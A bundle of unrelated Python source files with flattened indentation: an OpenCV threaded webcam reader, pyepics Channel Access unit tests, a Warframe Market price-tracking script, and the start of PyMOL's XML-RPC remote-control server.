# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src+ cv2.CAP_DSHOW)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def size(self):
# return size of the capture device
return self.stream.get(3), self.stream.get(4)
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
|
test_pv_unittests.py | #!/usr/bin/env python
# unit-tests for ca interface
import sys
import time
import numpy
import threading
import pytest
from contextlib import contextmanager
from epics import PV, get_pv, caput, caget, caget_many, caput_many, ca
import pvnames
def write(msg):
sys.stdout.write(msg)
sys.stdout.flush()
CONN_DAT ={}
CHANGE_DAT = {}
def onConnect(pvname=None, conn=None, chid=None, **kws):
write(' :Connection status changed: %s connected=%s\n' % (pvname, conn))
global CONN_DAT
CONN_DAT[pvname] = conn
def onChanges(pvname=None, value=None, **kws):
write( '/// New Value: %s value=%s, kw=%s\n' %( pvname, str(value), repr(kws)))
global CHANGE_DAT
CHANGE_DAT[pvname] = value
@contextmanager
def no_simulator_updates():
'''Context manager which pauses and resumes simulator PV updating'''
try:
caput(pvnames.pause_pv, 1, wait=True)
time.sleep(0.05)
yield
finally:
caput(pvnames.pause_pv, 0, wait=True)
def test_CreatePV():
write('Simple Test: create pv\n')
pv = get_pv(pvnames.double_pv)
assert pv is not None
def test_CreatedWithConn():
write('Simple Test: create pv with conn callback\n')
pv = get_pv(pvnames.int_pv, connection_callback=onConnect)
val = pv.get()
global CONN_DAT
conn = CONN_DAT.get(pvnames.int_pv, None)
assert conn
def test_caget():
write('Simple Test of caget() function\n')
pvs = (pvnames.double_pv, pvnames.enum_pv, pvnames.str_pv)
for p in pvs:
val = caget(p)
assert val is not None
assert caget(pvnames.str_pv) == 'ao'
def test_caget_many():
write('Simple Test of caget_many() function\n')
pvs = [pvnames.double_pv, pvnames.enum_pv, pvnames.str_pv]
vals = caget_many(pvs)
assert len(vals) == len(pvs)
assert isinstance(vals[0], float)
assert isinstance(vals[1], int)
assert isinstance(vals[2], str)
def test_caput_many_wait_all():
write('Test of caput_many() function, waiting for all.\n')
pvs = [pvnames.double_pv, pvnames.enum_pv, 'ceci nest pas une PV']
#pvs = ["MTEST:Val1", "MTEST:Val2", "MTEST:SlowVal"]
vals = [0.5, 0, 23]
t0 = time.time()
success = caput_many(pvs, vals, wait='all', connection_timeout=0.5, put_timeout=5.0)
t1 = time.time()
assert len(success) == len(pvs)
assert success[0] == 1
assert success[1] == 1
assert success[2] < 0
def test_caput_many_wait_each():
write('Simple Test of caput_many() function, waiting for each.\n')
pvs = [pvnames.double_pv, pvnames.enum_pv, 'ceci nest pas une PV']
#pvs = ["MTEST:Val1", "MTEST:Val2", "MTEST:SlowVal"]
vals = [0.5, 0, 23]
success = caput_many(pvs, vals, wait='each', connection_timeout=0.5, put_timeout=1.0)
assert len(success) == len(pvs)
assert success[0] == 1
assert success[1] == 1
assert success[2] < 0
def test_caput_many_no_wait():
write('Simple Test of caput_many() function, without waiting.\n')
pvs = [pvnames.double_pv, pvnames.enum_pv, 'ceci nest pas une PV']
#pvs = ["MTEST:Val1", "MTEST:Val2", "MTEST:SlowVal"]
vals = [0.5, 0, 23]
success = caput_many(pvs, vals, wait=None, connection_timeout=0.5)
assert len(success) == len(pvs)
#If you don't wait, ca.put returns 1 as long as the PV connects
#and the put request is valid.
assert (success[0] == 1)
assert (success[1] == 1)
assert (success[2] < 0)
def test_get1():
write('Simple Test: test value and char_value on an integer\n')
with no_simulator_updates():
pv = get_pv(pvnames.int_pv)
val = pv.get()
cval = pv.get(as_string=True)
assert int(cval) == val
def test_get_with_metadata():
with no_simulator_updates():
pv = get_pv(pvnames.int_pv, form='native')
# Request time type
md = pv.get_with_metadata(use_monitor=False, form='time')
assert 'timestamp' in md
assert 'lower_ctrl_limit' not in md
# Request control type
md = pv.get_with_metadata(use_monitor=False, form='ctrl')
assert 'lower_ctrl_limit' in md
assert 'timestamp' not in md
# Use monitor: all metadata should come through
md = pv.get_with_metadata(use_monitor=True)
assert 'timestamp' in md
assert 'lower_ctrl_limit' in md
# Get a namespace
ns = pv.get_with_metadata(use_monitor=True, as_namespace=True)
assert hasattr(ns, 'timestamp')
assert hasattr(ns, 'lower_ctrl_limit')
def test_get_string_waveform():
write('String Array: \n')
with no_simulator_updates():
pv = get_pv(pvnames.string_arr_pv)
val = pv.get()
assert (len(val) > 10)
assert isinstance(val[0], str)
assert len(val[0]) > 1
assert isinstance(val[1], str)
assert len(val[1]) > 1
def test_putcomplete():
write('Put with wait and put_complete (using real motor!) \n')
vals = (1.35, 1.50, 1.44, 1.445, 1.45, 1.453, 1.446, 1.447, 1.450, 1.450, 1.490, 1.5, 1.500)
p = get_pv(pvnames.motor1)
# this works with a real motor, fail if it doesn't connect quickly
if not p.wait_for_connection(timeout=0.2):
return
see_complete = []
for v in vals:
t0 = time.time()
p.put(v, use_complete=True)
count = 0
for i in range(100000):
time.sleep(0.001)
count = count + 1
if p.put_complete:
see_complete.append(True)
break
# print( 'made it to value= %.3f, elapsed time= %.4f sec (count=%i)' % (v, time.time()-t0, count))
assert len(see_complete) > (len(vals) - 5)
def test_putwait():
write('Put with wait (using real motor!) \n')
pv = get_pv(pvnames.motor1)
# this works with a real motor, fail if it doesn't connect quickly
if not pv.wait_for_connection(timeout=0.2):
return
val = pv.get()
t0 = time.time()
if val < 5:
pv.put(val + 1.0, wait=True)
else:
pv.put(val - 1.0, wait=True)
dt = time.time()-t0
write(' put took %s sec\n' % dt)
assert dt > 0.1
# now with a callback!
global put_callback_called
put_callback_called = False
def onPutdone(pvname=None, **kws):
print( 'put done ', pvname, kws)
global put_callback_called
put_callback_called = True
val = pv.get()
if val < 5:
pv.put(val + 1.0, callback=onPutdone)
else:
pv.put(val - 1.0, callback=onPutdone)
t0 = time.time()
while time.time()-t0 < dt*1.50:
time.sleep(0.02)
write(' put should be done by now? %s \n' % put_callback_called)
assert put_callback_called
# now using pv.put_complete
val = pv.get()
if val < 5:
pv.put(val + 1.0, use_complete=True)
else:
pv.put(val - 1.0, use_complete=True)
t0 = time.time()
count = 0
while time.time()-t0 < dt*1.50:
if pv.put_complete:
break
count = count + 1
time.sleep(0.02)
write(' put_complete=%s (should be True), and count=%i (should be>3)\n' %
(pv.put_complete, count))
assert pv.put_complete
assert count > 3
def test_get_callback():
write("Callback test: changing PV must be updated\n")
global NEWVALS
mypv = get_pv(pvnames.updating_pv1)
NEWVALS = []
def onChanges(pvname=None, value=None, char_value=None, **kw):
write( 'PV %s %s, %s Changed!\n' % (pvname, repr(value), char_value))
NEWVALS.append( repr(value))
mypv.add_callback(onChanges)
write('Added a callback. Now wait for changes...\n')
t0 = time.time()
while time.time() - t0 < 3:
time.sleep(1.e-4)
write(' saw %i changes.\n' % len(NEWVALS))
assert len(NEWVALS) > 3
mypv.clear_callbacks()
def test_put_string_waveform():
write('String Array: put\n')
with no_simulator_updates():
pv = get_pv(pvnames.string_arr_pv)
put_value = ['a', 'b', 'c']
pv.put(put_value, wait=True)
get_value = pv.get(use_monitor=False, as_numpy=False)
numpy.testing.assert_array_equal(get_value, put_value)
def test_put_string_waveform_single_element():
write('String Array: put single element\n')
with no_simulator_updates():
pv = get_pv(pvnames.string_arr_pv)
put_value = ['a']
pv.put(put_value, wait=True)
time.sleep(0.05)
get_value = pv.get(use_monitor=False, as_numpy=False)
assert put_value[0] == get_value
def test_put_string_waveform_mixed_types():
write('String Array: put mixed types\n')
with no_simulator_updates():
pv = get_pv(pvnames.string_arr_pv)
put_value = ['a', 2, 'b']
pv.put(put_value, wait=True)
time.sleep(0.05)
get_value = pv.get(use_monitor=False, as_numpy=False)
numpy.testing.assert_array_equal(get_value, ['a', '2', 'b'])
def test_put_string_waveform_empty_list():
write('String Array: put empty list\n')
with no_simulator_updates():
pv = get_pv(pvnames.string_arr_pv)
put_value = []
pv.put(put_value, wait=True)
time.sleep(0.05)
get_value = pv.get(use_monitor=False, as_numpy=False)
assert '' == ''.join(get_value)
def test_put_string_waveform_zero_length_strings():
write('String Array: put zero length strings\n')
with no_simulator_updates():
pv = get_pv(pvnames.string_arr_pv)
put_value = ['', '', '']
pv.put(put_value, wait=True)
time.sleep(0.05)
get_value = pv.get(use_monitor=False, as_numpy=False)
numpy.testing.assert_array_equal(get_value, put_value)
def test_subarrays():
write("Subarray test: dynamic length arrays\n")
driver = get_pv(pvnames.subarr_driver)
subarr1 = get_pv(pvnames.subarr1)
subarr1.connect()
len_full = 64
len_sub1 = 16
full_data = numpy.arange(len_full)/1.0
caput("%s.NELM" % pvnames.subarr1, len_sub1)
caput("%s.INDX" % pvnames.subarr1, 0)
driver.put(full_data) ;
time.sleep(0.1)
subval = subarr1.get()
assert (len(subval) == len_sub1)
assert numpy.all(subval == full_data[:len_sub1])
write("Subarray test: C\n")
caput("%s.NELM" % pvnames.subarr2, 19)
caput("%s.INDX" % pvnames.subarr2, 3)
subarr2 = get_pv(pvnames.subarr2)
subarr2.get()
driver.put(full_data) ; time.sleep(0.1)
subval = subarr2.get()
assert len(subval) == 19
assert (numpy.all(subval == full_data[3:3+19]))
caput("%s.NELM" % pvnames.subarr2, 5)
caput("%s.INDX" % pvnames.subarr2, 13)
driver.put(full_data) ; time.sleep(0.1)
subval = subarr2.get()
assert len(subval) == 5
assert (numpy.all(subval == full_data[13:5+13]))
def test_subarray_zerolen():
subarr1 = get_pv(pvnames.zero_len_subarr1)
subarr1.wait_for_connection()
val = subarr1.get(use_monitor=True, as_numpy=True)
assert isinstance(val, numpy.ndarray)
assert len(val) == 0
assert val.dtype == numpy.float64
val = subarr1.get(use_monitor=False, as_numpy=True)
assert isinstance(val, numpy.ndarray)
assert len(val) == 0
assert val.dtype == numpy.float64
def test_waveform_get_with_count_arg():
with no_simulator_updates():
# NOTE: do not use get_pv() here, as `count` is incompatible with
# the cache
wf = PV(pvnames.char_arr_pv, count=32)
val=wf.get()
assert len(val) == 32
val=wf.get(count=wf.nelm)
assert len(val) == wf.nelm
def test_waveform_callback_with_count_arg():
values = []
# NOTE: do not use get_pv() here, as `count` is incompatible with
# the cache
wf = PV(pvnames.char_arr_pv, count=32)
def onChanges(pvname=None, value=None, char_value=None, **kw):
write( 'PV %s %s, %s Changed!\n' % (pvname, repr(value), char_value))
values.append( value)
wf.add_callback(onChanges)
write('Added a callback. Now wait for changes...\n')
t0 = time.time()
while time.time() - t0 < 3:
time.sleep(1.e-4)
if len(values)>0:
break
assert len(values) > 0
assert len(values[0]) == 32
wf.clear_callbacks()
def test_emptyish_char_waveform_no_monitor():
'''a test of a char waveform of length 1 (NORD=1): value "\0"
without using auto_monitor
'''
with no_simulator_updates():
zerostr = PV(pvnames.char_arr_pv, auto_monitor=False)
zerostr.wait_for_connection()
# elem_count = 128, requested count = None, libca returns count = 1
zerostr.put([0], wait=True)
assert zerostr.get(as_string=True) == ''
numpy.testing.assert_array_equal(zerostr.get(as_string=False), [0])
assert zerostr.get(as_string=True, as_numpy=False) == ''
numpy.testing.assert_array_equal(zerostr.get(as_string=False, as_numpy=False), [0])
# elem_count = 128, requested count = None, libca returns count = 2
zerostr.put([0, 0], wait=True)
assert zerostr.get(as_string=True) == ''
numpy.testing.assert_array_equal(zerostr.get(as_string=False), [0, 0])
assert zerostr.get(as_string=True, as_numpy=False) == ''
numpy.testing.assert_array_equal(zerostr.get(as_string=False, as_numpy=False), [0, 0])
zerostr.disconnect()
def test_emptyish_char_waveform_monitor():
'''a test of a char waveform of length 1 (NORD=1): value "\0"
with using auto_monitor
'''
with no_simulator_updates():
zerostr = PV(pvnames.char_arr_pv, auto_monitor=True)
zerostr.wait_for_connection()
zerostr.put([0], wait=True)
time.sleep(0.2)
assert zerostr.get(as_string=True) == ''
numpy.testing.assert_array_equal(zerostr.get(as_string=False), [0])
assert zerostr.get(as_string=True, as_numpy=False) == ''
numpy.testing.assert_array_equal(zerostr.get(as_string=False, as_numpy=False), [0])
zerostr.put([0, 0], wait=True)
time.sleep(0.2)
assert zerostr.get(as_string=True) == ''
numpy.testing.assert_array_equal(zerostr.get(as_string=False), [0, 0])
assert zerostr.get(as_string=True, as_numpy=False) == ''
numpy.testing.assert_array_equal(zerostr.get(as_string=False, as_numpy=False), [0, 0])
zerostr.disconnect()
def testEnumPut():
pv = get_pv(pvnames.enum_pv)
assert pv is not None
pv.put('Stop')
time.sleep(0.1)
assert pv.get() == 0
def test_DoubleVal():
pvn = pvnames.double_pv
pv = get_pv(pvn)
pv.get()
cdict = pv.get_ctrlvars()
write( 'Testing CTRL Values for a Double (%s)\n' % (pvn))
assert 'severity' in cdict
assert len(pv.host) > 1
assert pv.count == 1
assert pv.precision == pvnames.double_pv_prec
assert pv.units == pvnames.double_pv_units
assert pv.access.startswith('read')
def test_type_converions_2():
write("CA type conversions arrays\n")
pvlist = (pvnames.char_arr_pv,
pvnames.long_arr_pv,
pvnames.double_arr_pv)
with no_simulator_updates():
chids = []
for name in pvlist:
chid = ca.create_channel(name)
ca.connect_channel(chid)
chids.append((chid, name))
ca.poll(evt=0.025, iot=5.0)
ca.poll(evt=0.05, iot=10.0)
values = {}
for chid, name in chids:
values[name] = ca.get(chid)
for promotion in ('ctrl', 'time'):
for chid, pvname in chids:
write('=== %s chid=%s as %s\n' % (ca.name(chid),
repr(chid), promotion))
time.sleep(0.01)
if promotion == 'ctrl':
ntype = ca.promote_type(chid, use_ctrl=True)
else:
ntype = ca.promote_type(chid, use_time=True)
val = ca.get(chid, ftype=ntype)
cval = ca.get(chid, as_string=True)
for a, b in zip(val, values[pvname]):
assert a == b
def test_waveform_get_1elem():
pv = get_pv(pvnames.double_arr_pv)
val = pv.get(count=1, use_monitor=False)
assert isinstance(val, numpy.ndarray)
assert (len(val) == 1)
def test_subarray_1elem():
with no_simulator_updates():
# pv = get_pv(pvnames.zero_len_subarr1)
pv = get_pv(pvnames.double_arr_pv)
pv.wait_for_connection()
val = pv.get(count=1, use_monitor=False)
print('val is', val, type(val))
assert isinstance(val, numpy.ndarray)
assert len(val) == 1
val = pv.get(count=1, as_numpy=False, use_monitor=False)
print('val is', val, type(val))
assert isinstance(val, list)
assert len(val) == 1
@pytest.mark.parametrize('num_threads', [1, 10, 200])
@pytest.mark.parametrize('thread_class', [ca.CAThread, threading.Thread])
def test_multithreaded_get(num_threads, thread_class):
def thread(thread_idx):
result[thread_idx] = (pv.get(),
pv.get_with_metadata(form='ctrl')['value'],
pv.get_with_metadata(form='time')['value'],
)
result = {}
ca.use_initial_context()
pv = get_pv(pvnames.double_pv)
threads = [thread_class(target=thread, args=(i, ))
for i in range(num_threads)]
with no_simulator_updates():
for thread in threads:
thread.start()
for thread in threads:
thread.join()
assert len(result) == num_threads
print(result)
values = set(result.values())
assert len(values) != 0
value, = values
assert value is not None
@pytest.mark.parametrize('num_threads', [1, 10, 100])
def test_multithreaded_put_complete(num_threads):
def callback(pvname, data):
result.append(data)
def thread(thread_idx):
pv.put(thread_idx, callback=callback,
callback_data=dict(data=thread_idx),
wait=True)
time.sleep(0.1)
result = []
ca.use_initial_context()
pv = get_pv(pvnames.double_pv)
threads = [ca.CAThread(target=thread, args=(i, ))
for i in range(num_threads)]
with no_simulator_updates():
for thread in threads:
thread.start()
for thread in threads:
thread.join()
assert len(result) == num_threads
print(result)
assert set(result) == set(range(num_threads))
def test_force_connect():
pv = get_pv(pvnames.double_arrays[0], auto_monitor=True)
print("Connecting")
assert pv.wait_for_connection(5.0)
print("SUM", pv.get().sum())
time.sleep(3)
print("Disconnecting")
pv.disconnect()
print("Reconnecting")
pv.force_connect()
assert pv.wait_for_connection(5.0)
called = {'called': False}
def callback(value=None, **kwargs):
called['called'] = True
print("update", value.sum())
pv.add_callback(callback)
time.sleep(1)
assert pv.get() is not None
assert called['called']
|
WM_API_Price_Finder.py | import requests
import json
import datetime
import webbrowser
import os.path
from time import sleep
#import for keyboard stop loop
from pynput import keyboard
from threading import Thread
# URL storage
main_URL = "https://api.warframe.market/v1/items"
login_URL = "https://api.warframe.market/v1/auth/signin"
profile_URL = "https://api.warframe.market/v1/profile"
# Global variables
Date_Today = datetime.date.today()
Date_Current = Date_Today.strftime("%Y-%m-%d")
Date_Yesterday = (Date_Today - datetime.timedelta(days=1)).strftime("%Y-%m-%d")
Keep_going = True
Track_file = "tracked.json"
# Function for the begining of the program for showing the first text and choose waht to do
def start_menu():
Info_text = ("\nThis program has the following features : \n- A search function for a mod or item of the market,"
"\n- A tracking feature for set items and price in a file that you can modify via this program or directly."
"\n\tYou will be alerted if one or more items are available on the website at the set price or lower")
print(Info_text)
while True:
print("\nWhat do you want to do :\n1 : search (default) \t 2 : track item price")
menu_input = input()
if menu_input == "" or menu_input == "1":
search_item()
break
elif menu_input == "2":
tracking_prices_management()
break
else:
print("\nError while selecting the feature, try again")
#Function to select which platform you use
def platform_selector():
while True:
print("\nFor which platform do you want to use this program ? PC is by default\n 1 - PC \t2 - PS4 \t3 - XBOX \t4 - SWITCH\n")
platform_selec = input()
if platform_selec == "1" or platform_selec == "2" or platform_selec == "3" or platform_selec == "4" or platform_selec == "":
if(platform_selec == ""): platform_selec = "1"
break
else:
print("\nError while selecting the platform")
platform = platform_print(platform_selec).upper()
print("You have chosen the following platform :",platform)
return platform
# Function for printing the chosen platform
def platform_print(input_plat:str):
platform = {
"1": 'pc',
"2": 'ps4',
"3": 'xbox',
"4": 'switch',
}
return platform.get(input_plat)
# Ask to open the web page of the requested item
def browser_open(search_string:str):
print("\nWould you like to buy/sell " + search_string.upper().replace('_', ' ') + " ? y/N")
browser_answer = input()
if browser_answer == "y":
webbrowser.open_new('https://warframe.market/items/' + search_string.replace(' ', '_'))
# Restart the script by going to main menu
def restart_script():
print("\nDo you want to go to the main menu ? Y/n")
restart_menu = input()
if restart_menu == "y" or restart_menu == "":
start_menu()
else:
print('\nPress Enter to close the program')
# Function that will search for a specific item or mod in the market2
def search_item():
nbr_item_output = 10
platform_search = platform_selector()
# Searching for item in a loop if it fails
while True:
print("\nSearch for an item")
wm_search = input()
print("\nSearching for " + wm_search.upper().replace('_', ' ') + "...\n")
# Request of the item on the appropriate platform
head = {'content type': 'application/json', 'Platform': platform_print(platform_search)}
wm_item_request = requests.get('https://api.warframe.market/v1/items/' + wm_search.replace(' ', '_') + '/orders', headers=head)
print(wm_item_request)
if wm_item_request.status_code == 200:
print("Request OK\n")
break
elif wm_item_request.status_code == 404:
print("Request failed\n\nMake sure to use the proper name of items, ex : mesa prime set, mesa prime blueprint\n")
# Output data in a json file
print(type(wm_item_request))
data = wm_item_request.json()
# Looking for the lowest prices
MinPrice = data['payload']['orders'][1]['platinum'] #Grab the first sell value of live statistics for the last 48 hours
data_access = data['payload']['orders'] #Precising the data field
# Loop for determining the lowest price available
i=0; j=0
wm_list = []
for item in data_access:
i+=1
if item['order_type'] == "sell": # Grabing only the sell orders
#print(item['user']['status'])
data_date = item['last_update'][0:10] # Extraction of only the date seperated with -
if data_date == Date_Current or data_date == Date_Yesterday: # Extracting date of today or
wm_list.insert(j,data_access[i-1])
j+=1
# Sorting by price first and then date
sorted_wm_list = sorted(wm_list, key= lambda x: (x['platinum'], x['last_update']))
wm_list_len = len(sorted_wm_list)
# Print of only by default the 10 first elements or all elements if < 10
if(wm_list_len < nbr_item_output):
nbr_item_output = wm_list_len
print("\nThe", nbr_item_output, "minimum prices found in the last ~24 hours all status combined for " + wm_search.upper().replace('_', ' ') +" are\n")
for element in range(nbr_item_output):
print(sorted_wm_list[element]['platinum'],"platinum as of :", sorted_wm_list[element]['last_update'][0:10])
browser_open(wm_search)
print("\nStart a new search? Y/n")
restart_answer = input()
if restart_answer == "y" or restart_answer == "":
search_item()
else:
restart_script()
# Function that split the tracking features into others function for more clarity in the code
def tracking_prices_management():
while True:
print("\nEntered tracking prices menu, what do you want to do :\n1 : Launch track mode \t2 : Add/Remove an item/mod/arcane \t3 : See the list of track items \t4 : Returning to the main menu\n")
track_input = input()
if track_input == "" or track_input == "1":
tracking_prices()
break
elif track_input == "2":
trackfile_management()
elif track_input == "3":
print("\nHere is what is the items tracked insid tracked.json")
tracked_print()
break
elif track_input == "4":
restart_script()
else:
print("Error while choosing what to do, try again")
restart_script()
# Loop for tracking the prices of set items in json file
def loop_price_check(loop_frequency:int, data_loop:dict, plateform:str):
while Keep_going:
head = {'content type': 'application/json', 'Platform': platform_print(plateform)}
# double loop that request all the items in tracked.json
for categories in data_loop:
print("\n\nFor the", categories, "category :")
for element in data_loop[categories]:
list_items = []
# try the request first in case there is a type and request fail so we can still do the other items
try:
wf_track_item = requests.get('https://api.warframe.market/v1/items/' + element['name'].lower().replace(' ', '_') + '/orders', headers=head)
# Extracting the data ine of every item from tracked.json
data_track_item = wf_track_item.json()
dt = data_track_item['payload']['orders']
output_structure={}
# loop that checks for online and ingame offers under the set price
for wf_item in dt:
if wf_item['order_type'] == "sell" and (wf_item['user']['status'] == "online" or wf_item['user']['status'] == "ingame"):
if wf_item['platinum'] <= element['price']:
list_items.append({'name': wf_item['user']['ingame_name'], 'price' : wf_item['platinum'], 'reg': wf_item['user']['region']})
# list that collect every order under the set price
output_structure[str(element['name'])] = list_items
print("\n-",element['name'].upper().replace('_', ' '), ":", str(element['price']), "platinum")
# print based on incrasing price of items
output_sorted = sorted(output_structure[element['name']], key=lambda x: x['price'])
for k in output_sorted:
print("\tPrice :", k['price'], "\tRegion :", k['reg'],"\t","Player name :", k['name'], )
except Exception:
print("\nError with", element['name'],"check that it's using the correct format")
continue
if data_loop[categories] == []:
print("\nNo items to track in the", categories, "category")
#pprint.pprint(output_structure)
print("\nAuto search done, doing it again in", loop_frequency,"minutes")
sleep(loop_frequency*60)
# Detection of pressed key
def on_press(key, abortKey='esc'):
global Keep_going
try:
k = key.char # single-char keys
except:
k = key.name # other keys
if k == abortKey:
Keep_going = False
print('\nEnd of checking prices')
sleep(1)
return False # stop listener
# Function that launch the tracking loop, ask how often the loop is refreshed and create tracked.json if not created
def tracking_prices():
check_price_time = 5
platform_track = platform_selector()
while True:
print("\nTracking prices mode, how frequently do you want to check prices in minutes ? Press Enter for default 5 min")
check_price_time = input()
if check_price_time.isnumeric() and int(check_price_time) > 0:
break
elif check_price_time == "":
check_price_time = 5
break
else:
print("Error while setting loop time check, enter an integer value")
print("\nPress escape to end the tracking loop")
# initialize tracked.json field if not already created
file_structure = {"items": [],"mods": [], "arcanes":[]}
if os.path.isfile(Track_file):
print("Tracked file present in directory")
else:
print("File not present, creating it")
write_json(file_structure, Track_file)
data_tracked = load_json(Track_file)
abortKey = 'esc'
listener = keyboard.Listener(on_press=on_press, abortKey=abortKey)
listener.start() # start to listen on a separate thread
# start thread with loop
Thread(target=loop_price_check, args=(int(check_price_time), data_tracked, platform_track), name='loop_price_check', daemon=True).start()
listener.join() # wait for abortKey
#Function where you can add or delete items in tracked.json
def trackfile_management():
print("\nHere is the current track items :")
tracked_print()
# while used to get a correct command to prevent errors and typo in tracked.json
while True:
print("\n\nTo add a new item use the key word add , then the category (items, mods, arcanes) and the name, with or without '_' symbol and the limit price"
"\nTo remove an item use the key word remove or rm, then the category (items, mods, arcanes) and the line number of the item"
"\nExample : add flow mods 15 /// remove items 1\n")
input_management = input()
words = input_management.split(' ')
command_type = words[0]
if command_type == "add":
if len(words) < 4:
print("error typing")
else:
category = words[-2]
price = words[-1]
name = words[1:-2]
if category != "items" and category != "mods" and category != "arcanes":
print("\nError while choosing the category, use items, mods or arcanes")
elif isinstance(price, float) or not (price.isdigit()) or (int(price) <= 0) :
print("\nError while choosing the price, use positive non null integer numbers")
else:
adding = {'name': ' '.join(name), 'price': int(price)}
break
elif command_type == "remove" or command_type == "rm":
if len(words) < 3 or len(words) > 3:
print("error typing")
else:
category = words[1]
row = words[-1]
if category != "items" and category != "mods" and category != "arcanes":
print("\nError while choosing the category, use items, mods or arcanes")
elif isinstance(row, float) or not (row.isdigit()) or (int(row) <= 0) :
print("\nError while choosing the line to delete, use positive non null integer numbers")
else:
row = int(row)-1 # Convert into an integer and reduce the value by one cause start index is 0 not 1
break
else:
print("\nError while typing command")
data = load_json(Track_file)
if command_type == "add":
add_json(data, Track_file, category,adding)
print("Data added")
elif command_type == "remove" or command_type == "rm":
del_json(data, Track_file, category, row)
print("Data removed")
# Print tracked.json data
def tracked_print():
data = load_json(Track_file)
for category in data:
print("\n-",category)
for item in data[category]:
print("\t{:<25s} at {} platinum".format(item['name'].upper(), item['price'])) # better print that reserve 25 characters before the next print object
# Load all the data of the passed file
def load_json(filename:str):
with open(filename) as f:
data = json.load(f)
return data
# Function that write given data in a given file
def write_json(data:dict, filename:str):
with open(filename, "w") as f:
json.dump(data, f, indent=4)
# Function that add a given item in tracked.json
def add_json(data:dict, filename:str, selector:str, text:dict):
with open(filename) as file:
data = json.load(file)
tmp = data[selector]
tmp.append(text)
write_json(data, filename)
# Function that delete a given dict in the list of tracked.json
def del_json(data:dict, filename:str, selector:str, row:int):
with open(filename) as file:
data = json.load(file)
tmp = data[selector]
tmp.pop(row)
write_json(data, filename)
###########################################################################################################################
# MAIN #
###########################################################################################################################
def main():
# Testing API responses according to URL in the program
print("Testing API responses\n")
WMresponseR = requests.get(main_URL)
print(WMresponseR)
#Program starting only if the API works, redirect to the menu selector
if WMresponseR.status_code == 200:
print("API OK\n")
start_menu()
elif WMresponseR.status_code == 404:
print("API ERROR\n")
print("Something is wrong about the status of the API, check the URL used, the status of warframe market, your internet connection, your firewall and launch again the program.")
else:
print(WMresponseR.status_code)
print("Something is wrong about the status of the API, check the URL used, the status of warframe market, your internet connection, your firewall and launch again the program.")
close_input = input() # to not instantly close the window program
if __name__ == "__main__":
main()
|
rpc.py | """ an XML-RPC server to allow remote control of PyMol
Author: Greg Landrum (glandrum@users.sourceforge.net)
Created: January 2002
$LastChangedDate: 2016-12-05 14:04:04 -0500 (Mon, 05 Dec 2016) $
License: PyMol
Requires:
- a python xmlrpclib distribution containing the SimpleXMLRPCServer
module (1.0 or greater should be fine)
- python with threading enabled
RD Version: $Rev: 4164 $
Modified 2013-04-17 Thomas Holder, Schrodinger, Inc.
"""
from __future__ import print_function
import sys
if sys.version_info[0] == 2:
import SimpleXMLRPCServer
else:
import xmlrpc.server as SimpleXMLRPCServer
import threading,os,tempfile
from pymol import cmd,cgo
# initial port to try for the server
_xmlPort=9123
# number of alternate ports to try if the first fails
_nPortsToTry=5
def rpcPing():
""" Used to establish whether or not the server is alive.
This is a good thing to call after establishing a connection just to
make sure that everything is ok.
Returns 1
"""
return 1
def rpcLabel(pos,labelText,id='lab1',color=(1,1,1)):
""" create a text label
Arguments:
pos: a 3 tuple with the position of the label
text: a string with the label
color: a 3 tuple with the color of the label. (1,1,1) is white
id: (OPTIONAL) the name of the object to be created
NOTE:
at the moment this is, how you say, a hack
"""
cmd.pseudoatom(id, label=repr(labelText), elem='C', pos=pos)
cmd.set_color("%s-color"%id,color)
cmd.color("%s-color"%id,id)
return 1
def rpcResetCGO(id):
""" removes a CGO from the local dictionary
"""
global cgoDict
if id=="*":
cgoDict={}
res = 1
elif id in cgoDict:
del(cgoDict[id])
res = 1
else:
res = 0
return res
def rpcSphere(pos,rad,color,id='cgo',extend=1,
transparent=0,transparency=0.5):
""" create a sphere
Arguments:
pos: a 3 tuple with the position of the sphere
rad: a float with the radius
color: a 3 tuple with the color of the sphere. (1,1,1) is white
id: (OPTIONAL) the name of the object to be created
extend: (OPTIONAL) if this is nonzero, the object will be cleared
before adding the new sphere. Otherwise the sphere is appended
to the ojbect
transparent: (OPTIONAL) sets the object to be transparent
transparency: (OPTIONAL) the percent transparency of the object
"""
r,g,b = color
x,y,z = pos
if extend:
obj = cgoDict.get(id,[])
else:
obj = []
if not transparent:
o = []
else:
o = [cgo.ALPHA,1-transparency]
o.extend([cgo.COLOR,r,g,b,cgo.SPHERE,x,y,z,rad])
obj.extend(o)
cgoDict[id] = obj
cmd.load_cgo(obj,id,1)
return 1
def rpcRenderCGO(cgoV,id='cgo',extend=1):
""" renders a CGO vector
Arguments:
cgoV: a vector of floats
id: (OPTIONAL) the name of the object to be created
extend: (OPTIONAL) if this is nonzero, the object will be cleared
before adding the new sphere. Otherwise the sphere is appended
to the ojbect
"""
if extend:
obj = cgoDict.get(id,[])
else:
obj = []
obj.extend(cgoV)
cmd.load_cgo(obj,id,1)
return 1
def rpcSpheres(sphereD,id='cgo',extend=1):
""" create a sphere
Arguments:
sphereD: a series of (pos,rad,color,transparent,transparency) tuples
id: (OPTIONAL) the name of the object to be created
extend: (OPTIONAL) if this is nonzero, the object will be cleared
before adding the new sphere. Otherwise the sphere is appended
to the ojbect
"""
if extend:
obj = cgoDict.get(id,[])
else:
obj = []
for pos,rad,color,transparent,transparency in sphereD:
r,g,b = color
x,y,z = pos
if not transparent:
o = []
else:
o = [cgo.ALPHA,1-transparency]
o.extend([cgo.COLOR,r,g,b,cgo.SPHERE,x,y,z,rad])
obj.extend(o)
cgoDict[id] = obj
cmd.load_cgo(obj,id,1)
return 1
def rpcCylinder(end1,end2,rad,color1,id='cgo',color2=None,extend=1,
transparent=0,transparency=0.5):
""" create a cylinder
Arguments:
end1: a 3 tuple with the position of end1 of the sphere
end2: a 3 tuple with the position of end1 of the sphere
rad: a float with the radius
color1: a 3 tuple with the color of end1 of the sphere. (1,1,1) is white
